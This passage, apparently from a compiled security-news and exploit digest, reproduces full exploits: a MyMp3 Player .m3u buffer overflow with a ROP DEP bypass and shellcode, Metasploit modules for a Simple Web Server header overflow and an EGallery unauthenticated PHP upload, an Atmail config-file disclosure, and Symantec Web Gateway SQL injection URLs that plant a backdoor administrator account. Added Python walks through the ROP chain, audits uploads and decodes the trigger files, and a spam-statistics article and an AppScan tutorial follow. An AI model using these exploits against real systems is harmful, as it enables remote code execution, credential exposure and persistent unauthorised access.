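    return ["ignore " + r for r in sorted(parse_log(lines)) if r not in own]


def strongest(lines):
    """RFPI with the highest RSSI seen; usually the base station nearest to you."""
    seen = {k: v for k, v in parse_log(lines).items() if v["rssi"] is not None}
    return max(seen, key=lambda k: seen[k]["rssi"]) if seen else None


# Constructed sample log in the format shown above (not captured from a real run).
SAMPLE_LOG = [
    "### found new call on 00 82 31 33 73 on channel 7 RSSI 34",
    "### found new call on 01 30 95 13 37 on channel 3 RSSI 12",
    "### found new call on 00 82 31 33 73 on channel 7 RSSI 36",
    "### trying to sync on 00 82 ab b0 29",
    "### dumping to dump_2011-06-11_21_37_37_RFPI_00_82_ab_b0_29.pcap",
]

if __name__ == "__main__":
    print("strongest signal:", strongest(SAMPLE_LOG))
    for cmd in ignore_commands(SAMPLE_LOG, ["00 82 31 33 73"]):
        print(cmd)
```

Paste the printed ignore lines into dect_cli before starting autorec; the strongest RSSI is only a hint for which base station is yours, so confirm it with a test call as described above.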
15. MyMp3 Player Stack .m3u DEP Bypass Exploit

[table=width: 500, class: grid] [tr] [td]EDB-ID: 20053[/td] [td]CVE: N/A [/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: Daniel Romero[/td] [td]Published: 2012-07-23[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table]

'''
Title: MyMp3-Player '.m3u' Stack BOF (Bypass DEP)
Author: Daniel Romero Perez (@daniel_rome)
Software & Version: MyMp3-Player 3.02.067
Tested on: Windows XP SP3 - ES
Mail: unlearnsecurity@gmail.com
Blog: unlearningsecurity.blogspot.com
Advisor: http://www.securityfocus.com/bid/38835/info
Article: http://unlearningsecurity.blogspot.com.es/2012/07/bypass-dep-no-permanente-con.html
'''

import os
import struct

# Buffer
Buff = "\x41" * 1024

# ShellCode (ruby msfpayload windows/exec CMD=calc.exe R | ruby msfencode -b '\x0a\x0d\x20\x00' -t c) - 227 bytes
ShellCode = ("\xb8\xf8\x16\x8a\x64\xd9\xe9\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x33\x31\x46\x12\x83\xc6\x04\x03\xbe\x18\x68\x91\xc2\xcd\xe5"
"\x5a\x3a\x0e\x96\xd3\xdf\x3f\x84\x80\x94\x12\x18\xc2\xf8\x9e"
"\xd3\x86\xe8\x15\x91\x0e\x1f\x9d\x1c\x69\x2e\x1e\x91\xb5\xfc"
"\xdc\xb3\x49\xfe\x30\x14\x73\x31\x45\x55\xb4\x2f\xa6\x07\x6d"
"\x24\x15\xb8\x1a\x78\xa6\xb9\xcc\xf7\x96\xc1\x69\xc7\x63\x78"
"\x73\x17\xdb\xf7\x3b\x8f\x57\x5f\x9c\xae\xb4\x83\xe0\xf9\xb1"
"\x70\x92\xf8\x13\x49\x5b\xcb\x5b\x06\x62\xe4\x51\x56\xa2\xc2"
"\x89\x2d\xd8\x31\x37\x36\x1b\x48\xe3\xb3\xbe\xea\x60\x63\x1b"
"\x0b\xa4\xf2\xe8\x07\x01\x70\xb6\x0b\x94\x55\xcc\x37\x1d\x58"
"\x03\xbe\x65\x7f\x87\x9b\x3e\x1e\x9e\x41\x90\x1f\xc0\x2d\x4d"
"\xba\x8a\xdf\x9a\xbc\xd0\xb5\x5d\x4c\x6f\xf0\x5e\x4e\x70\x52"
"\x37\x7f\xfb\x3d\x40\x80\x2e\x7a\xbe\xca\x73\x2a\x57\x93\xe1"
"\x6f\x3a\x24\xdc\xb3\x43\xa7\xd5\x4b\xb0\xb7\x9f\x4e\xfc\x7f"
"\x73\x22\x6d\xea\x73\x91\x8e\x3f\x10\x74\x1d\xa3\xf9\x13\xa5"
"\x46\x06")

Nops = "\x90" * 50

## ROP --> Bypass DEP with SetProcessDEPPolicy
ROP = struct.pack('<L',0x77f4c25f)    # POP EBX / RET
ROP += struct.pack('<L',0x41414141)   # JUNK
ROP += struct.pack('<L',0xFFFFFFFF)   # PARAMETER 0x00000000 - 0x1 = 0xFFFFFFFF
ROP += struct.pack('<L',0x7e810b7e)   # INC EBX / RET
ROP += struct.pack('<L',0x77f445bf)   # POP EBP / RET
ROP += struct.pack('<L',0x7C862144)   # <- SetProcessDEPPolicy
ROP += struct.pack('<L',0x77f45493)   # POP EDI / RET
ROP += struct.pack('<L',0x77f4108c)   # RET
ROP += struct.pack('<L',0x77f4567e)   # POP ESI / RET
ROP += struct.pack('<L',0x77f4108c)   # RET
ROP += struct.pack('<L',0x58c35ff7)   # PUSHAD / RET

# Exploit
exploit = Buff + ROP + Nops + ShellCode

# Create File
file = open("exploit_mymp3-player_BOF.m3u", "wb")
file.write(exploit)
file.close()

print ("Your file has been generated successfully!!")
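The script below is an added example, not part of Daniel Romero's exploit: it walks the ROP chain above on a toy stack to show how the PUSHAD trick ends up calling SetProcessDEPPolicy(0) and returning into the NOP sled, and it checks the chain against the bad-character list the shellcode was encoded with (which is why the chain pops 0xFFFFFFFF and increments it rather than popping a four-zero-byte 0). Two assumptions are the example's own: the stack base address is arbitrary, and the JUNK dword is modelled as being skipped by the overflowed function's own return (a ret 4 style epilogue), since the exploit does not say how that dword is consumed.

```python
import struct

# Addresses and gadget semantics copied from the exploit's comments (Windows XP SP3 ES).
SETPROCESSDEPPOLICY = 0x7C862144
GADGETS = {
    0x77f4c25f: ("pop ebx", "ret"),
    0x7e810b7e: ("inc ebx", "ret"),
    0x77f445bf: ("pop ebp", "ret"),
    0x77f45493: ("pop edi", "ret"),
    0x77f4108c: ("ret",),
    0x77f4567e: ("pop esi", "ret"),
    0x58c35ff7: ("pushad", "ret"),
}
CHAIN = [0x77f4c25f, 0x41414141, 0xFFFFFFFF, 0x7e810b7e,   # EBX = -1, then INC -> 0
         0x77f445bf, SETPROCESSDEPPOLICY,                  # EBP = API to call
         0x77f45493, 0x77f4108c,                           # EDI = RET
         0x77f4567e, 0x77f4108c,                           # ESI = RET
         0x58c35ff7]                                       # PUSHAD / RET
BAD_CHARS = b"\x0a\x0d\x20\x00"   # the msfencode -b list from the exploit


def build_chain():
    """Same bytes the exploit's ROP variable holds."""
    return b"".join(struct.pack("<L", d) for d in CHAIN)


def find_bad_chars(data, bad=BAD_CHARS):
    """(offset, byte) for every byte the .m3u delivery would mangle."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def simulate(stack_base=0x0012F000, nop_len=50, skipped_dwords=1):
    """Run the chain on a toy stack until control reaches SetProcessDEPPolicy.

    stack_base is arbitrary (assumption). skipped_dwords models the 0x41414141 JUNK
    entry: the chain only lines up if the overflowed function's own return skips one
    dword after popping the first gadget (e.g. a `ret 4` epilogue); the exploit does
    not say how that happens, so it is an assumption of this simulation.
    """
    mem = bytearray(build_chain()) + b"\x90" * nop_len
    nop_addr = stack_base + len(build_chain())

    def rd(addr):
        off = addr - stack_base
        if not 0 <= off <= len(mem) - 4:
            raise RuntimeError("read outside controlled stack: 0x%08x" % addr)
        return struct.unpack("<L", mem[off:off + 4])[0]

    def wr(addr, val):
        off = addr - stack_base
        if not 0 <= off <= len(mem) - 4:
            raise RuntimeError("write outside controlled stack: 0x%08x" % addr)
        mem[off:off + 4] = struct.pack("<L", val & 0xFFFFFFFF)

    regs = dict.fromkeys(("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"), 0)
    regs["esp"] = stack_base
    eip = rd(regs["esp"])                      # the overflowed function returns into gadget 1
    regs["esp"] += 4 + 4 * skipped_dwords
    trace = []
    for _ in range(32):                        # more than enough gadgets for this chain
        if eip == SETPROCESSDEPPOLICY:
            # stdcall: [esp] is the return address, [esp+4] is the dwFlags argument
            return {"arg": rd(regs["esp"] + 4), "return_to": rd(regs["esp"]),
                    "nop_sled": nop_addr, "ebx": regs["ebx"], "trace": trace}
        if eip not in GADGETS:
            raise RuntimeError("landed on a non-gadget address 0x%08x" % eip)
        trace.append(eip)
        for op in GADGETS[eip]:
            if op == "ret":
                eip = rd(regs["esp"]); regs["esp"] += 4
            elif op.startswith("pop "):
                regs[op[4:]] = rd(regs["esp"]); regs["esp"] += 4
            elif op.startswith("inc "):
                regs[op[4:]] = (regs[op[4:]] + 1) & 0xFFFFFFFF
            elif op == "pushad":               # pushes EAX,ECX,EDX,EBX,orig ESP,EBP,ESI,EDI
                orig_esp = regs["esp"]
                for val in (regs["eax"], regs["ecx"], regs["edx"], regs["ebx"],
                            orig_esp, regs["ebp"], regs["esi"], regs["edi"]):
                    regs["esp"] -= 4
                    wr(regs["esp"], val)
    raise RuntimeError("chain never reached SetProcessDEPPolicy")


if __name__ == "__main__":
    r = simulate()
    print("SetProcessDEPPolicy(0x%08x), returns to 0x%08x (NOP sled at 0x%08x)"
          % (r["arg"], r["return_to"], r["nop_sled"]))
    print("bad chars in chain:", find_bad_chars(build_chain()))
```

After PUSHAD the RET pops EDI and ESI (both plain RET gadgets), then EBP, which is SetProcessDEPPolicy; at that moment the saved ESP sits where a return address belongs, pointing at the NOPs, and the saved EBX (0) sits where the dwFlags argument belongs, so DEP is disabled for the process and execution continues in the sled.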
16. Simple Web Server Connection Header Buffer Overflow

[table=width: 500, class: grid] [tr] [td]EDB-ID: 20028[/td] [td]CVE: N/A [/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: metasploit[/td] [td]Published: 2012-07-23[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table]

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] }

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Simple Web Server Connection Header Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote
        user can send a long string in the Connection header to cause an overflow on
        the stack when vsprintf() is used, and gain arbitrary code execution. The
        module has been tested successfully on Windows 7 SP1 and Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mr.pr0n', # Vulnerability Discovery and PoC
          'juan'     # Metasploit module
        ],
      'References'     =>
        [
          ['EDB', '19937'],
          ['URL', 'http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/']
        ],
      'Payload'        =>
        {
          'BadChars'       => "\x00\x0a\x0d",
          'Space'          => 2048,
          'DisableNops'    => true,
          'PrependEncoder' => "\x81\xC4\x60\xF0\xFF\xFF", # add esp, -4000
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => "process",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'       => 0x6fcbc64b, # call edi from libstdc++-6.dll
              'Offset'    => 2048,
              'OffsetEDI' => 84
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jul 20 2012",
      'DefaultTarget'  => 0))
  end

  def check
    res = send_request_raw({'uri'=>'/'})
    if res and res.headers['Server'] =~ /PMSoftware\-SWS\/2\.[0-2]/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    # Layout: payload, padding up to the saved return address, "call edi",
    # then 84 bytes up to where EDI points, and a short jump back to the payload.
    sploit = payload.encoded
    sploit << rand_text(target['Offset'] - sploit.length)
    sploit << [target.ret].pack("V") # eip
    sploit << rand_text(target['OffsetEDI'])
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{sploit.length}").encode_string

    print_status("Trying target #{target.name}...")
    connect
    send_request_cgi({
      'uri'        => '/',
      'version'    => '1.1',
      'method'     => 'GET',
      'connection' => sploit
    })
    disconnect
  end
end
17. EGallery PHP File Upload Vulnerability

[table=width: 500, class: grid] [tr] [td]EDB-ID: 20029[/td] [td]CVE: N/A [/td] [td]OSVDB-ID: 83891[/td] [/tr] [tr] [td]Author: metasploit[/td] [td]Published: 2012-07-23[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table]

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "EGallery PHP File Upload Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in EGallery 1.2. By abusing the
        uploadify.php file, a malicious user can upload a file to the egallery/
        directory without any authentication, which results in arbitrary code
        execution. The module has been tested successfully on Ubuntu 10.04.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Sammy FORGIT', # Discovery, PoC
          'juan'          # Metasploit module
        ],
      'References'     =>
        [
          ['OSVDB', '83891'],
          ['BID', '54464'],
          ['URL', 'http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "none"
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['EGallery 1.2', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jul 08 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to EGallery', '/sample'])
      ], self.class)
  end

  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}egallery/uploadify.php"
    })

    if res and res.code == 200 and res.body.empty?
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    payload_name = rand_text_alpha(rand(10) + 5) + '.php'

    boundary = Rex::Text.rand_text_hex(7)

    # Same three fields Uploadify's client sends: Filename, folder, Filedata
    post_data = "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"Filename\"\r\n\r\n"
    post_data << "#{payload_name}\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"folder\"\r\n\r\n"
    post_data << "#{uri}\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n"
    post_data << "<?php "
    post_data << payload.encoded
    post_data << " ?>\r\n"
    post_data << "--#{boundary}--\r\n"

    print_status("#{peer} - Sending PHP payload (#{payload_name})")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}egallery/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{boundary}",
      'data'   => post_data
    })

    # If the server returns 200 and the body contains our payload name,
    # we assume we uploaded the malicious file successfully
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      print_error("#{peer} - File wasn't uploaded, aborting!")
      return
    end

    print_status("#{peer} - Executing PHP payload (#{payload_name})")
    # Execute our payload
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}#{payload_name}"
    })

    # If we don't get a 200 when we request our malicious payload, we suspect
    # we don't have a shell, either. Print the status code for debugging purposes.
    if res and res.code != 200
      print_status("#{peer} - Server returned #{res.code.to_s}")
    end
  end
end
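The Python below is an added example, not part of the Metasploit module or of EGallery: it builds the same three-field multipart body the module sends (Filename, folder, Filedata), parses it the way an upload handler would, and lists the checks that uploadify.php evidently does not perform. The boundary and sample payload are constructed, and the rejection rules (script extension, path characters, PHP open tag, client-chosen absolute folder) are this example's own suggestions for a hardened handler, not EGallery code.

```python
import os
import re

# Extensions the web server would execute if the file lands under the document root.
EXECUTABLE_EXT = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}


def build_uploadify_body(boundary, folder, filename, content):
    """Multipart body with the three fields the module sends: Filename, folder, Filedata."""
    body = ""
    for name, fname, value in (("Filename", None, filename),
                               ("folder", None, folder),
                               ("Filedata", filename, content)):
        body += "--%s\r\n" % boundary
        disposition = 'Content-Disposition: form-data; name="%s"' % name
        if fname is not None:
            disposition += '; filename="%s"' % fname
        body += disposition + "\r\n\r\n" + value + "\r\n"
    return body + "--%s--\r\n" % boundary


def parse_multipart(body, boundary):
    """Minimal multipart/form-data parser: returns a list of (name, filename, data)."""
    parts = []
    for chunk in body.split("--" + boundary)[1:]:
        if chunk.startswith("--"):
            break                                  # closing delimiter
        head, _, data = chunk.partition("\r\n\r\n")
        name = re.search(r';\s*name="([^"]*)"', head)
        fname = re.search(r'filename="([^"]*)"', head)
        if name is None:
            continue
        if data.endswith("\r\n"):
            data = data[:-2]
        parts.append((name.group(1), fname.group(1) if fname else None, data))
    return parts


def audit_upload(parts):
    """Checks an upload handler should make before trusting Filedata; each finding rejects."""
    fields = {name: (fname, data) for name, fname, data in parts}
    findings = []
    fname, data = fields.get("Filedata", (None, ""))
    if fname is not None:
        if os.path.splitext(fname)[1].lower() in EXECUTABLE_EXT:
            findings.append("server-side script extension in Filedata filename")
        if re.search(r"[\\/]|\.\.", fname):
            findings.append("path characters in Filedata filename")
    if data.lstrip().startswith("<?"):
        findings.append("PHP open tag in uploaded content")
    folder = fields.get("folder", (None, ""))[1]
    if folder.startswith("/") or ".." in folder or "\\" in folder:
        findings.append("client-chosen destination folder outside an allowed subdirectory")
    return findings


if __name__ == "__main__":
    # Constructed request shaped like the module's (boundary and payload are made up).
    body = build_uploadify_body("e5b2c1d", "/sample/", "xyz.php",
                                "<?php system($_GET['c']); ?>")
    for finding in audit_upload(parse_multipart(body, "e5b2c1d")):
        print("reject:", finding)
```

A handler that applied only the first two checks would still accept a .jpg whose content is PHP, which is why the content and the destination folder are checked as well; the server-chosen destination should be fixed in configuration rather than read from the request.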
18. Atmail WebAdmin and Webmail Control Panel SQL Root Password Disclosure

[table=width: 500, class: grid] [tr] [td]EDB-ID: 20037[/td] [td]CVE: N/A [/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: Ciph3r[/td] [td]Published: 2012-07-23[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table]

######################################################################################
# Vuln Title: Atmail WebAdmin and webmail Control Panel Remote Access SQL Root password Vulnerability
#
# Author: FaryadR (a.k.a Ciph3r)
# tested on : Atmail Email Server 6.20.8
# Twitter : https://twitter.com/faryadR
# Mail : Ciph3r.secure@gmail.com
# Website : http://0c0c0c0c.com
# Vendor : http://atmail.com
# Powered by Atmail 6.20.8 - WebAdmin Control Panel
#
######################################################################################

[+] Vulnerability: you can access the whole Atmail WebAdmin mail server configuration, including the SQL root password.

[+] PoC: go to the webmail config directory and request dbconfig.ini to access the whole SQL configuration.

[+] Demo for testing the vuln:

[+] Atmail 6.20.8
http://server/config/dbconfig.ini
19. Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers

[table=width: 500, class: grid] [tr] [td]EDB-ID: 20044[/td] [td]CVE: 2012-2961[/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: muts[/td] [td]Published: 2012-07-23[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table]

######################################################################################
# Exploit Title: Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers
# Date: Jul 23 2012
# Author: muts
# Version: Symantec Web Gateway 5.0.3.18
# Vendor URL: http://www.symantec.com
#
# Timeline:
#
# 12 Jun 2012: Vulnerability reported to CERT
# 22 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012
# 26 Jun 2012: Email received from Symantec for additional information
# 26 Jun 2012: Additional proofs of concept sent to Symantec
# 06 Jul 2012: Update received from Symantec with intent to fix
# 20 Jul 2012: Symantec issued patch: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00
# 23 Jul 2012: Public Disclosure
#
######################################################################################

Accessing the following URLs will create a new trigger that adds a user account to the victim database. The injection point is blind, so the result is written to disk with INTO OUTFILE: the first request writes the trigger-name file (.TRN) and the second writes the trigger definition file (.TRG) into the MySQL data directory, with LINES TERMINATED BY supplying everything after the first line of each file.

https://server/spywall/ldap_latest.php?ip=1 union select 'TYPE=TRIGGERNAME' into outfile '/var/lib/mysql/spywall_db/ins_trig.TRN' LINES TERMINATED BY '\ntrigger_table=eventlog\n';--

https://server/spywall/ldap_latest.php?ip=1 union select 'TYPE=TRIGGERS' into outfile '/var/lib/mysql/spywall_db/eventlog.TRG' LINES TERMINATED BY '\ntriggers=\'CREATE DEFINER=`shadm`@`localhost` trigger ins_trig after insert on eventlog\\nfor each row\\nbegin\\nINSERT INTO users VALUES("muts","21232f297a57a5a743894a0e4a801fc3","NULL","4773","2","3","N/A","0","0","0","","hacker@offsec.com","1336255408","0","0","0");\\nend\'\nsql_modes=0\ndefiners=\'shadm@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';--

With the MySQL trigger files in place, an authenticated user can initiate a reboot of the remote system by accessing the following URL. When a user logs back in to the application, the insert into eventlog fires the trigger and the new user is added to the system.

https://server/spywall/scheduledReboot.php
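The Python below is an added example, not part of muts' advisory: it decodes the two LINES TERMINATED BY literals the way MySQL decodes a single-quoted string, renders what the two INTO OUTFILE statements write to ins_trig.TRN and eventlog.TRG, and then reads the .TRG file back to recover the account the trigger inserts. It assumes the original ip=1 query contributes no rows (so only the UNION row is written) and MySQL's default FIELDS options; the md5 comparison shows that the injected hash is md5("admin"), i.e. the backdoor user logs in with the password admin.

```python
import hashlib
import re

# The two LINES TERMINATED BY literals from the URLs above, minus their outer quotes.
TRN_TERMINATOR = r'\ntrigger_table=eventlog\n'
TRG_TERMINATOR = r'''\ntriggers=\'CREATE DEFINER=`shadm`@`localhost` trigger ins_trig after insert on eventlog\\nfor each row\\nbegin\\nINSERT INTO users VALUES("muts","21232f297a57a5a743894a0e4a801fc3","NULL","4773","2","3","N/A","0","0","0","","hacker@offsec.com","1336255408","0","0","0");\\nend\'\nsql_modes=0\ndefiners=\'shadm@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n'''

_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "0": "\0", "b": "\b", "Z": "\x1a"}


def mysql_unescape(literal):
    """Decode backslash escapes and '' inside the body of a single-quoted MySQL literal."""
    out, i = [], 0
    while i < len(literal):
        c = literal[i]
        if c == "\\" and i + 1 < len(literal):
            out.append(_ESCAPES.get(literal[i + 1], literal[i + 1]))  # \\ -> \, \' -> '
            i += 2
        elif literal.startswith("''", i):
            out.append("'")
            i += 2
        else:
            out.append(c)
            i += 1
    return "".join(out)


def render_outfile(rows, terminator_literal):
    """What SELECT ... INTO OUTFILE writes for one-column rows with default FIELDS options."""
    terminator = mysql_unescape(terminator_literal)
    return "".join(row + terminator for row in rows)


def render_trn_file():
    """Contents of /var/lib/mysql/spywall_db/ins_trig.TRN after the first request."""
    return render_outfile(["TYPE=TRIGGERNAME"], TRN_TERMINATOR)


def render_trg_file():
    """Contents of /var/lib/mysql/spywall_db/eventlog.TRG after the second request."""
    return render_outfile(["TYPE=TRIGGERS"], TRG_TERMINATOR)


def parse_trg(text):
    """Read a .TRG file back into a dict; quoted values use the same escaping as literals."""
    out = {}
    for line in text.splitlines():
        key, _, value = line.partition("=")
        if len(value) >=2 and value.startswith("'") and value.endswith("'"):
            value = mysql_unescape(value[1:-1])
        out[key] = value
    return out


def backdoor_credentials(trg_text):
    """(user, md5 hash, hash == md5('admin')) for the row the trigger inserts into users."""
    body = parse_trg(trg_text)["triggers"]
    m = re.search(r'INSERT INTO users\s*VALUES\("([^"]+)","([0-9a-f]{32})"', body)
    user, digest = m.group(1), m.group(2)
    return user, digest, digest == hashlib.md5(b"admin").hexdigest()


if __name__ == "__main__":
    print(render_trn_file())
    print(render_trg_file())
    print(backdoor_credentials(render_trg_file()))
```

The doubled backslashes in the URL matter: a single \n in the literal becomes a real newline (a new key=value line of the .TRG file), while \\n becomes the two characters backslash-n, which is how MySQL stores line breaks inside the quoted trigger body. On a defender's side, an unexpected .TRG/.TRN pair in the data directory, or a trigger whose definer does not match the schema owner's intent, is the artifact to look for.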
20. India sends you the most spam

Summary: More than one in 10 of every spam e-mail sent in the world comes from India. More broadly, every other spam e-mail sent in the world comes from Asia.

By Emil Protalinski for Zero Day | July 23, 2012 -- Updated 21:26 GMT (14:26 PDT)

Which country is responsible for the largest share of the spam sent in the world? You can excuse the usual culprits that have led the pack in years before, like Canada, China, Brazil, South Korea, and the U.S. There's a new kid on the block, and she's pretty big: India. In fact, if you get spam (and who doesn't?), there's a more than one in 10 chance that it was relayed from an Indian computer.

The latest data comes from Sophos, which releases a Dirty Dozen spam report every quarter. This one is for Q1 2012:

India - 11.4 percent
Italy - 7.0 percent
South Korea - 6.7 percent
U.S. - 6.2 percent
Vietnam - 5.8 percent
Brazil - 4.4 percent
Pakistan - 3.7 percent
China - 3.2 percent
France - 3.1 percent
Russia - 2.9 percent
Poland - 2.7 percent
Taiwan - 2.6 percent
Other - 40.3 percent

India also topped the last Dirty Dozen report, when it overtook the U.S. as the world's top spam-relaying country in Q4 2011. At the time, India contributed 9.3 percent of all spam sent worldwide, while the U.S. was at 8.3 percent. Now India has solidified its position as the biggest global contributor to the junk e-mail problem: it is at 11.4 percent, while all the remaining countries are in the single digits.

India is contributing to the growing percentage of spam that comes from its continent. The latest breakdown is as follows: Asia (49.7 percent), Europe (26.4 percent), South America (11.2 percent), North America (8.6 percent), Africa (3.6 percent), and Other/Unclassified (0.5 percent).

Most of the spammers probably don't promote Asian goods, nor do they reside in Asia. Instead, they are simply relaying their messages through compromised Asian zombie computers that are part of a botnet.

"The chief driver for Asia's dominance in the spam charts is the sheer number of compromised computers in the continent," a Sophos spokesperson said in a statement. "Malicious hackers hijack poorly-protected computers, and command them - without their owners realising - to send out unwanted money-making messages and malicious links. Everyone has a responsibility to ensure that their PC or Mac is properly defended against such attacks. If they take no care over their computers they're simply adding to the world's spam problem. The latest 'Dirty Dozen' stats suggest that as more first-time internet users get online in growing economies they are not taking appropriate measures to block the malware infections that turn their PCs into spam-spewing zombies."

http://www.zdnet.com/india-sends-you-the-most-spam-7000001422/
21. IBM Rational AppScan is one of the most widely used tools in the arena of web application penetration testing. It is a desktop application which helps security professionals automate the process of vulnerability assessment. This article focuses on configuring and starting a scan using AppScan. Analysing the scan results will be covered in my next article.

Main features in AppScan:

The Rational AppScan 8.5 Standard edition has many new features, most of which I cover in the brief outline below:

Flash support: AppScan 8.0 has increased Flash support compared to its earlier versions. It can now explore and test applications based on the Adobe Flex framework. The AMF protocol is also supported.

Glass box testing: Glass box scanning is a new feature introduced in AppScan. It installs an agent on the server which helps find hidden URLs and additional issues.

Web services scanning: Web service scanning is one area where organizations are looking for more effective automated support, and AppScan has scored well here.

JavaScript security analyzer: AppScan has introduced a JavaScript security analyser which analyses the crawled HTML pages for vulnerabilities and lets users focus on client-side issues and DOM (document object model) based XSS problems.

Reporting: Based on your requirements, you can generate reports in the desired formats and include the fields you want.

Remediation support: For the identified vulnerabilities, the program provides a description of the issue along with remediation notes.

Customizable scanning policies: AppScan comes with a set of defined scanning policies. You can customize the policies to suit your needs.

Tools support: It has tools like Authentication Tester, Token Analyzer, and HTTP Request Editor which come in handy when testing for vulnerabilities manually.

Support for Ajax and Dojo frameworks.

Let us now proceed to learn more about installation and the process of scanning web applications using Rational AppScan.

Installation:

To run Rational AppScan the system needs a minimum of 2 GB RAM. Also make sure to install the .NET Framework and Adobe Flash Player, so that Flash content can be executed during scanning.

Before we proceed further, it is worth noting that this automated scanner sends loads of data to the server while the scan is in progress. It might delete files on the server, add new records or even bring the server down unintentionally. It is therefore advisable to properly back up all the data before you proceed with the scan.

Before you click the setup file, close any applications that are open. After clicking on the setup file, the installation wizard appears. If you have not installed the .NET Framework earlier, AppScan will now install it and ask for a restart. By following the wizard instructions the installation process can be completed pretty easily. If you are using the default license, you will only be allowed to scan the AppScan testing website. To scan your own site, you need to purchase one.

Explore & Test Stages:

Before we start a scan, let us get an overview of how AppScan works. Any automated scanner has two goals: find all the available links, and attack the application to find vulnerabilities.

Explore: In the explore stage AppScan tries to traverse all the available links in the website and build a hierarchical structure. It sends requests and, depending on the responses, identifies the locations where there is scope for a vulnerability. For example, upon seeing a login page it would identify that there is scope for authentication bypass through SQL injection. Note that it only "identifies" the test case; it does not perform any attack in this stage. In this way it sends several requests, building the structure of the site while noting down the test cases.

Test: In the test stage, AppScan attacks the application to test for the vulnerabilities. The actual attack payloads are now sent to identify the security holes in the test cases that were built in the explore stage. It also ranks the severity of the risk. The test stage might reveal new links in the site, so AppScan begins another round of scanning after completing the explore and test stages, and continues to do so until there are no more links to be tested. Please note that the number of rounds of scanning is also configurable by the user in the settings.

Start a scan in AppScan:

A trial version of AppScan can be downloaded and installed from the link below:

Download: IBM Security AppScan V8.5

To begin a scan, start AppScan and you'll see the Welcome screen as shown in Figure 1.

Figure 1

Click on "Create New Scan" to start scanning a new web application.

Figure 2

Select a scan template that suits your requirements. Templates consist of a scan configuration that is already defined. After selecting a template, the configuration wizard appears. It will ask you to select the type of scan. Select "Web Application Scan" and click on Next.

